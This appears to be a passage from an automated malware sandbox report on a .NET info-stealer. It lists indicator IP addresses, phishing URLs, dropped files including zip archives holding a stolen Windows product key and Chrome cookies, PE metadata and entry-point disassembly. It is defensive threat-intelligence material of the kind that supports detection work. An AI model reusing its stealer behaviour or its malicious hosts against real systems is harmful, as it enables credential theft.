                            CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
                            • 188.114.96.3
                            FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                            • 104.26.2.16
                            GOOGLE-AS-APGoogleAsiaPacificPteLtdSGd34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 34.117.188.166
                            8NjcvPNvUr.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 34.117.188.166
                            file.exeGet hashmaliciousUnknownBrowse
                            • 34.117.188.166
                            file.exeGet hashmaliciousUnknownBrowse
                            • 34.117.188.166
                            file.exeGet hashmaliciousUnknownBrowse
                            • 34.117.188.166
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 34.117.188.166
                            file.exeGet hashmaliciousUnknownBrowse
                            • 34.117.188.166
                            engine.ps1Get hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            GBTCLOUDUSfile.exeGet hashmaliciousVidarBrowse
                            • 45.8.98.78
                            gNUm2TLDfk.elfGet hashmaliciousMiraiBrowse
                            • 154.9.249.164
                            eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                            • 45.91.122.235
                            J518aeIXac.elfGet hashmaliciousMiraiBrowse
                            • 154.9.249.164
                            bYwkSL4eL1.elfGet hashmaliciousMiraiBrowse
                            • 154.9.249.164
                            eMPGHX9z40.elfGet hashmaliciousMiraiBrowse
                            • 154.9.249.164
                            pdZMKb4EyS.elfGet hashmaliciousMiraiBrowse
                            • 154.9.249.164
                            k1i5aA0JvX.elfGet hashmaliciousMiraiBrowse
                            • 154.9.249.164
                            GxRF285IVu.elfGet hashmaliciousMiraiBrowse
                            • 154.9.249.164
                            SQdwZ4QoQU.elfGet hashmaliciousMiraiBrowse
                            • 154.9.249.164

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            28a2c9bd18a11de089ef85a160da29e4d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                            • 23.206.229.209
                            https://azadengg.com/MTQwOTk4NzcwMg==sfmaxWjJWdUxYQm5lQzA0TXpVMU1EZ3dNMmxtZUdOb1lYWmxlbkpwYzNoaGFYSmliM0p1TG1OdmJRPT0=&c=E,1,LZxP3HHb1f9qSYvI9qirqXkUUBAc_Lly3K7xLwNdfYOBECyaKUoAd-t3gcHqWT79cExKeBU56i8wGFRIGcXn5xtHq6aoS1GJuvxV76lYjLuWHw,,&typo=1Get hashmaliciousUnknownBrowse
                            • 23.206.229.209
                            https://www.kudoboard.com/boards/ZWwsi9jgGet hashmaliciousUnknownBrowse
                            • 23.206.229.209
                            https://f522my.fi79.fdske.com/ec/gAAAAABmpB7T0a5uPS5ojzr4t_T3OUm-FdnelJXDBC1VoV6m2V3L_fPLJYD_I4iovDAQynFwUxenvGcRNh2X00urBe5-4u-rT9GnyUh1X4xs-bp1jFgbdnQWjG990ZIV-3jiRSF6xm2yQVII0IUZNMTwe6xA7L7bXWw_begThms8P6liFgUdG6VQSYwrbqAxhU2UEyqaypup8CoqX1XTXX22SapdlozSl3U2FuKV8U9lz4_YoWYvXaj9erwugsbbIzwuyoMgDRxdh9iJQFak65dYgkq2tGXY1LV-S0k2sDgZf7wEDr63jmpMQO3SzqMfQA3mGK6zccUXpwE0i3r8hj5z4np9jw5lE8Wcp6N7QIvI_qpBMTJqfmuaZZdQ5LOQYKgqx2tl9eUzVwZBUsvbcRUHD4gPhSo47eQGLiImSy0uueaOd9GD5v-xXSggcJV4oiu3m7MRPADdbsVfsrtFilW1dPy_5ezRxo0JN8be1WWGWOeTVzt3fK4=Get hashmaliciousUnknownBrowse
                            • 23.206.229.209
                            http://cache.netflix.com.sg5.wuush.us.kg/Get hashmaliciousUnknownBrowse
                            • 23.206.229.209
                            http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                            • 23.206.229.209
                            http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                            • 23.206.229.209
                            http://investors.spotify.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                            • 23.206.229.209
                            http://cache.netflix.com.sg3.wuush.us.kg/Get hashmaliciousUnknownBrowse
                            • 23.206.229.209
                            http://apple.vn377.com/Get hashmaliciousUnknownBrowse
                            • 23.206.229.209
                            3b5074b1b5d032e5620f69f9f700ff0ed34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            QIKiV83Pkl.exeGet hashmaliciousDCRatBrowse
                            • 34.117.59.81
                            Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 34.117.59.81
                            FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                            • 34.117.59.81
                            e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                            • 34.117.59.81
                            file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                            • 34.117.59.81
                            SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            engine.ps1Get hashmaliciousUnknownBrowse
                            • 34.117.59.81
                            37f463bf4616ecd445d4a1937da06e19Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            R86BRY7DdC.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 104.21.65.79
                            d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                            • 104.21.65.79
                            Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
                            • 104.21.65.79
                            SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79
                            SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                            • 104.21.65.79

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Mu7iyblZk8.exe.log

                            Download File
                            Process:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):425
                            Entropy (8bit):5.357964438493834
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                            MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                            SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                            SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                            SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                            Malicious:true
                            Reputation:moderate, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WareHouse.exe.log

                            Download File
                            Process:C:\Users\user\AppData\Roaming\WareHouse.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):425
                            Entropy (8bit):5.357964438493834
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                            MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                            SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                            SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                            SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Victim_SID[1].bd

                            Download File
                            Process:C:\Users\user\AppData\Roaming\WareHouse.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):47616
                            Entropy (8bit):7.3984749546983055
                            Encrypted:false
                            SSDEEP:768:bRinnuikZHazYr+sPVlc1/Sdi0bNxf6lj1rEpBdE4DYywm9Tpfb+pSuGmyZCQrUz:cnpkZHIcs1/rBLDmRBbCqZCQIsPS
                            MD5:3E3D6FD0B466B60CA1E91DC596C05DF3
                            SHA1:9E09372C4597A6405DF167DFE5C2671F1F62A706
                            SHA-256:8F60AA9F4D6672F149B1873CBDB398600A3250019A3CDBB000814C23B92E7C8E
                            SHA-512:FA052957886D4998773AFF3329D3154911DA49D8302E8EC617BBCECF32C4B10552001BE57FDCF0A99CFC1139978B23CE7C35827780E789C2CFA9A3E3F2A179A5
                            Malicious:false
                            Preview:..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.*LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.*>.s...je..G..DX...<ks.\X.B.j.|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY|.....L.pLY.l..!..GA.L+.:..w3nx.j...L..LYZL+7Ll.L..LY.L~PL.....L+.Y....1....r;.k.LY.L+.h)\L..LY.L~bZN.LYQL+8Ll.L..LY.L~.....U.L+DLl.L.....L~.L..LY..i.LlVL..LY.L~.L....oL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll..*.LY/L~.L.,LYdL+.Ll.L..LY..=kL.LY.L+e.H.L.PLY.L~.L..LY.L+...SL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Ll.L.i.U~L~.L.9..7L+.LlfL..LYa.>9L.#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LYEM*-Ll.L..).L~KL.LY.L+.Ll?L.`LY{L~.L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Miox[1].bd

                            Download File
                            Process:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):549888
                            Entropy (8bit):7.502351834702483
                            Encrypted:false
                            SSDEEP:12288:8GG05BruCTSgDhijYyE0Vd8IfhH8dcSLQq/BRrYpv5aOpP1B:th5BKCTSgFKfV6AhHmLQ3vD
                            MD5:4B4817111C116D67CFBF962D471D7BA3
                            SHA1:CF81B3E931A6BFFD7B9CC8559C736EF25B69EF07
                            SHA-256:98683FAF487B5C7807471A857D1147711E0568E4B3F2EBB176E3E411CC648752
                            SHA-512:6EBAA5DB6381249A05241EDCA59EC73BA2504EDB5AA3529B1F8CEE82BCCD230F208AF2442285644F79D9299D2F377EAB35B0E2A61EF6F3DC50875FAD396D3F0A
                            Malicious:false
                            Preview:..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.*LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.*>.s...je..G..DX...<ks.\X.B.j.|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY|.....L.pLY.l..!..GA.L+/...x;;....L..LYZL+7Ll.L..LY.L~PL.....L+.Y..f.1....r;.k.LY.L+..K.Y..LY.L~V\..LYQL+8Ll.L..LY.L~.....$.).DLl.L.....L~.L..LY.L+.LlVL..LY.L~.N..LYoL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll..*.LY/L~.L.,LYdL+.Ll.L..LY.O}w&r.LY.L+e.H.L.PLY.L~.L..LY.L+..HSL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Lly....$.Z.L..'a7L+.LlfL..LY!L~.&r#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LY..j....L..).L~KL.LY.....!.Y.`LY....L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Miox[1].bd

                            Download File
                            Process:C:\Users\user\AppData\Roaming\WareHouse.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):549888
                            Entropy (8bit):7.502351834702483
                            Encrypted:false
                            SSDEEP:12288:8GG05BruCTSgDhijYyE0Vd8IfhH8dcSLQq/BRrYpv5aOpP1B:th5BKCTSgFKfV6AhHmLQ3vD
                            MD5:4B4817111C116D67CFBF962D471D7BA3
                            SHA1:CF81B3E931A6BFFD7B9CC8559C736EF25B69EF07
                            SHA-256:98683FAF487B5C7807471A857D1147711E0568E4B3F2EBB176E3E411CC648752
                            SHA-512:6EBAA5DB6381249A05241EDCA59EC73BA2504EDB5AA3529B1F8CEE82BCCD230F208AF2442285644F79D9299D2F377EAB35B0E2A61EF6F3DC50875FAD396D3F0A
                            Malicious:false
                            Preview:..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.*LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.*>.s...je..G..DX...<ks.\X.B.j.|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY|.....L.pLY.l..!..GA.L+/...x;;....L..LYZL+7Ll.L..LY.L~PL.....L+.Y..f.1....r;.k.LY.L+..K.Y..LY.L~V\..LYQL+8Ll.L..LY.L~.....$.).DLl.L.....L~.L..LY.L+.LlVL..LY.L~.N..LYoL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll..*.LY/L~.L.,LYdL+.Ll.L..LY.O}w&r.LY.L+e.H.L.PLY.L~.L..LY.L+..HSL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Lly....$.Z.L..'a7L+.LlfL..LY!L~.&r#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LY..j....L..).L~KL.LY.....!.Y.`LY....L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Victim_SID[1].bd

                            Download File
                            Process:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):47616
                            Entropy (8bit):7.3984749546983055
                            Encrypted:false
                            SSDEEP:768:bRinnuikZHazYr+sPVlc1/Sdi0bNxf6lj1rEpBdE4DYywm9Tpfb+pSuGmyZCQrUz:cnpkZHIcs1/rBLDmRBbCqZCQIsPS
                            MD5:3E3D6FD0B466B60CA1E91DC596C05DF3
                            SHA1:9E09372C4597A6405DF167DFE5C2671F1F62A706
                            SHA-256:8F60AA9F4D6672F149B1873CBDB398600A3250019A3CDBB000814C23B92E7C8E
                            SHA-512:FA052957886D4998773AFF3329D3154911DA49D8302E8EC617BBCECF32C4B10552001BE57FDCF0A99CFC1139978B23CE7C35827780E789C2CFA9A3E3F2A179A5
                            Malicious:false
                            Preview:..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.*LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.*>.s...je..G..DX...<ks.\X.B.j.|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY|.....L.pLY.l..!..GA.L+.:..w3nx.j...L..LYZL+7Ll.L..LY.L~PL.....L+.Y....1....r;.k.LY.L+.h)\L..LY.L~bZN.LYQL+8Ll.L..LY.L~.....U.L+DLl.L.....L~.L..LY..i.LlVL..LY.L~.L....oL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll..*.LY/L~.L.,LYdL+.Ll.L..LY..=kL.LY.L+e.H.L.PLY.L~.L..LY.L+...SL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Ll.L.i.U~L~.L.9..7L+.LlfL..LYa.>9L.#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LYEM*-Ll.L..).L~KL.LY.L+.Ll?L.`LY{L~.L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.

                            C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\i4t3jxvo.4yb\[user]-[813848].zip

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):598
                            Entropy (8bit):6.576981076252395
                            Encrypted:false
                            SSDEEP:12:5jw79RUCxx6iG80lz6SF9bZP3kUhqC2MUydF4o7YCx0G80nQz6sEt:9wZv6b4YRZPjh500F4oRfft
                            MD5:080B844A05D5DBBFC88FF8DC5186A0F3
                            SHA1:D6869F24E53310734D10118665388402A1A38862
                            SHA-256:20236F1666D4E2407C6CE2507F797AF63720D87A80C58210DAB2E41DC86874FB
                            SHA-512:E6405450A4FDAE8A2CDE460AF3468881231B855522AF03F9F5212DC839F479F35F201F6969CE75D420CCF833D60CC66BC925E76DEF35EF774AB800C8C1D21234
                            Malicious:false
                            Preview:PK.........,.X'..........."...Others\Windows Product Key\key.txt...3.5..p.......p.....2..0..PK.........,.X4`c.....4...*...Chromium\Google Chrome\Default\Cookies.txt...n.0...;.......[....P.A@......2P*..u.......81.Y.u......f.....,\lHl.P......mM/%....D.D...../._.....w.W).~...H..?..:.v|.....`GjGC.8..R+.%.d.........M.....Q.....1Y|S.O.........U$...T.w..g]^.!..<B.a..W(....vh-.mt.g.Jl...Mv..z..Gs.D..;?...PK...........,.X'...........".................Others\Windows Product Key\key.txtPK...........,.X4`c.....4...*............._...Chromium\Google Chrome\Default\Cookies.txtPK....................

                            C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\qx5topcr.5mp\[user]-[813848].zip

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):598
                            Entropy (8bit):6.581587911540293
                            Encrypted:false
                            SSDEEP:12:5j69RUCxx6r0lz6SF9bZP3kUhqC2MUydF4CYCxF0nQz6sEt:9Ov6A4YRZPjh500F41fft
                            MD5:D6238A1E22FFE5B8C26733F5CEC028CA
                            SHA1:CC2202BD5CEE0AF44C81EEFE4B6D47326B5598CD
                            SHA-256:3832938DC2CC5C38565EC2D8723AB3394D46EBF58046EF2AF6CAF16E27AAFA90
                            SHA-512:56AE43BB84A05BEB71F1E10F8EBC8E158E734B1B14107EFD0B0A17B879E77C5D2B9E8462F6FCF6ED5BBA6D6DA4A7615D27CB2FEB8CEA5907AD3D3AA40EEC25E8
                            Malicious:false
                            Preview:PK.........,.X'..........."...Others\Windows Product Key\key.txt...3.5..p.......p.....2..0..PK.........,.X4`c.....4...*...Chromium\Google Chrome\Default\Cookies.txt...n.0...;.......[....P.A@......2P*..u.......81.Y.u......f.....,\lHl.P......mM/%....D.D...../._.....w.W).~...H..?..:.v|.....`GjGC.8..R+.%.d.........M.....Q.....1Y|S.O.........U$...T.w..g]^.!..<B.a..W(....vh-.mt.g.Jl...Mv..z..Gs.D..;?...PK...........,.X'...........".................Others\Windows Product Key\key.txtPK...........,.X4`c.....4...*............._...Chromium\Google Chrome\Default\Cookies.txtPK....................

                            C:\Users\user\AppData\Roaming\WareHouse.exe

                            Download File
                            Process:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):79872
                            Entropy (8bit):5.8008179820157535
                            Encrypted:false
                            SSDEEP:1536:LMSYHfrowgvVhCU/EKx/s3VntC9vXQqov0cNRf4Dk/So6oa9DJjAWmJCo:LMSsfrowgdh7s3Vt0Qqov7RfCFo6oa9m
                            MD5:74F11A170C0A518CE076AE43F70A7C06
                            SHA1:86CAFA195CA0905F79A4E877C13AD0C7CED257E5
                            SHA-256:EFDAC8EAFDF875DE010FE0A6980AAD44B547C2A74430C185A28D67E98168C4B3
                            SHA-512:EB0DB729F76C17C71A10130302E58665310596F19111D6ECF0E1FED19BEF60FBE5E41D816D1241D5F58A33F89AEA1D8868AA8600E1D256AF80C45475DA68605C
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 37%
                            • Antivirus: Virustotal, Detection: 24%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................4...........Q... ...`....@.. ....................................@..................................Q..L............................`.......Q...............................................Q............... ..H............text...S2... ...4.................. ..`.reloc.......`.......6..............@..B........................................................H........v..............................................................".(.....*...>.(.......}....*.0..'.......~.........(....t............(...+...3.*......0..'.......~.........(....t............(...+...3.*......0..'.......~.........(....t............(...+...3.*......0..'.......~.........(....t............(...+...3.*.....B.~.......o.....*....0...........~.....8.....*......".......*....0............(....(...............8.....*......B.~.......o.....*....0..a........~....%:....&~......

                            C:\Users\user\AppData\Roaming\WareHouse.exe:Zone.Identifier

                            Download File
                            Process:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:true
                            Preview:[ZoneTransfer]....ZoneId=0

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):5.8008179820157535
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            File name:Mu7iyblZk8.exe
                            File size:79'872 bytes
                            MD5:74f11a170c0a518ce076ae43f70a7c06
                            SHA1:86cafa195ca0905f79a4e877c13ad0c7ced257e5
                            SHA256:efdac8eafdf875de010fe0a6980aad44b547c2a74430c185a28d67e98168c4b3
                            SHA512:eb0db729f76c17c71a10130302e58665310596f19111d6ecf0e1fed19bef60fbe5e41d816d1241d5f58a33f89aea1d8868aa8600e1d256af80c45475da68605c
                            SSDEEP:1536:LMSYHfrowgvVhCU/EKx/s3VntC9vXQqov0cNRf4Dk/So6oa9DJjAWmJCo:LMSsfrowgdh7s3Vt0Qqov7RfCFo6oa9m
                            TLSH:78732AA4ABE8D127C2AB8737F46102050BB5E54B7A42E74B5DCC68CC6E037855F216FB
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................4...........Q... ...`....@.. ....................................@................................

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0x4151de
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66A37FB8 [Fri Jul 26 10:51:36 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [004151ECh]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            rcl byte ptr [ecx+01h], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            mov eax, 0066A37Fh
                            add byte ptr [eax], al
                            add byte ptr [edx], al
                            add byte ptr [eax], al
                            add byte ptr [ebx+00h], al
                            add byte ptr [eax], al
                            adc byte ptr [edx+01h], dl
                            add byte ptr [eax], dl
                            xor al, 01h
                            add byte ptr [edx+53h], dl
                            inc esp
                            push ebx
                            fidivr word ptr [ebx+095DE811h]
                            pushad
                            dec edi
                            call far 4435h : 81A95F81h
                            rol byte ptr [ecx], 00000000h
                            add byte ptr [eax], al
                            inc ebx
                            cmp bl, byte ptr [ebp+edx*2+73h]
                            jc 00007F2E40DF5176h
                            pop esp
                            push ebp
                            jnc 00007F2E40DF5167h
                            jc 00007F2E40DF515Eh
                            inc esp
                            jnc 00007F2E40DF516Eh
                            je 00007F2E40DF5171h
                            jo 00007F2E40DF515Eh
                            dec edi
                            jne 00007F2E40DF5176h
                            jo 00007F2E40DF5177h
                            je 00007F2E40DF5175h
                            pop esp
                            dec edi
                            insd
                            bound ebp, dword ptr [edi+78h]
                            popad
                            popad
                            jbe 00007F2E40DF5130h
                            jo 00007F2E40DF5166h
                            bound eax, dword ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
